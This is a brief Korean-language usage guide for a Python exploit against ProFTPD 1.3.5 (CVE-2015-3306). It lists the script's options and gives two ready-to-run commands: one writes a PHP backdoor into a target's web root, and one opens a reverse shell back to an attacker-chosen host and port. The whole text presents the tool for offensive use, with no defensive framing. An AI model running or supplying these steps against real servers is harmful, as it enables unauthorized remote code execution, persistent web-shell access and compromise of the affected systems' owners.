
ProFTPD 1.3.5 CVE-2015-3306용 익스플로잇으로, 대상 웹 루트에 PHP 백도어를 작성하고 원격 코드 실행을 위한 리버스 셸을 생성합니다.
ProFTPd 1.3.5 RCE
사용법: ProFTPD.py [옵션]
옵션:
-h, --help 도움말 메시지를 보여주고 종료합니다,
-l LHOST, --lhost=LHOST
리버스 셸에 필요한 로컬 IP,
-p LPORT, --lport=LPORT
리버스 셸에 필요한 포트,
-t TARGET, --target=TARGET
취약한 대상,
-d DIRECTORY, --dir=DIRECTORY
백도어를 업로드할 웹루트 디렉터리, 기본값: /var/www/html
-c COMMAND, --command=COMMAND
시스템 명령어,
-f FILE, --file=FILE
백도어 이름, 기본값: shell.php.
1단계 - 대상 머신에 백도어 쓰기!
사용법: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
2단계 - 셸 획득!!
사용법: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242